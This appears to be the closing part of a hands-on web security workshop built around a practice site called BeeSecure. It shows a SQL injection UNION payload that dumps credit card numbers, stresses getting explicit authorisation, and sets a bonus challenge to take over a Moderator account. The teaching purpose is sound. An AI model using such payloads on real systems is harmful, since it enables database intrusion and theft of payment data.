&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    

One way to inject the query could've been to input:
```
randomJunk' UNION SELECT creditcard FROM users UNION SELECT 'fakeCard
```

And with this we have a nice list of credit cards!

## Summary
We've:
- Learnt about SQL and the potential for SQL injection attacks
- Identified an SQL injection vulnerability in BeeSecure
- Use the SQL injection vulnerability to enumerate the database and find out where useful secrets are
- Used our knowledge of the database to leak a set of credit cards

# Overall Summary

Hopefully you've learnt that:
- Lots of different threats affect lots of different systems
- One of the best ways to protect a network/website/piece of software is to attempt a friendly attack!
- It's easier than you think to break the law and **you really really shouldn't**
- No seriously, **never** attack or look for weaknesses in a system you don't have **explicit authorisation** to mess with
- A common category of attacks involves tricking a system into interpreting malicious user input as code
- Client-Side Code Injection allows threat actors to steal (or modify!) information in other client's browsers
- Server-Side Code Injection, in particular SQL injection, allows threat actors to steal (or modify!) information in databases
- Cyber security is super cool and you should all come join us working in it :)

# Attack 3??

If you've made it this far with time to spare then well done! You're probably looking for a challenge.

**Final Bonus Challenge**  
We'll give you a prize if you
- Hack BeeSecure in a way that surprises us

and/or

- Gain control of the `Moderator` account through any means (Potential Hint: MD5)

Try not to break the website since others are probably still working on earlier challenges. Let us know if you're unsure if something is safe to do and we'll take a look. But hey it happens, so if you do break the site don't stress. Just let us know and we'll fix it. :)